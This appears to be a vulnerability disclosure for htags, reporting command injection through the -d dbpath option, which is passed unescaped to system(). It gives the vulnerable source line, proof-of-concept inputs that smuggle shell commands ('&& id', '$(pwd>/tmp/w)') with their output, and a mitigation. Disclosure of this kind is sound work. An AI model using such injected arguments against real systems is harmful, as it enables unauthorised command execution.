Hi, I found a security vulnerability in htags. htags takes the input provided in the dbpath option (-d) and appends it to a command string that will later be executed by system() function, without any escaping, leading to a command injection vulnerability.
Vulnerable code: src/htags/htags.c:L1336 Reproduce: - Run htags by injecting a command in the dbpath argument (-d) : $ htags --suggest2 -d '&& id' // SNIP uid=1000(user1) gid=1000(user1) groups=1000(user1),24(cdrom),25(floppy),27(sudo) htags: GPATH, GTAGS and/or GRTAGS not found. Please reexecute htags with the -g option. $ htags --suggest2 -d '$(pwd>/tmp/w)' $ cat /tmp/w /home/user1/tests Environment: Tested in Debian 12, htags version 6.6.12 Mitigation: Options added to or used in system commands should be validated and escaped before used. Best Regards
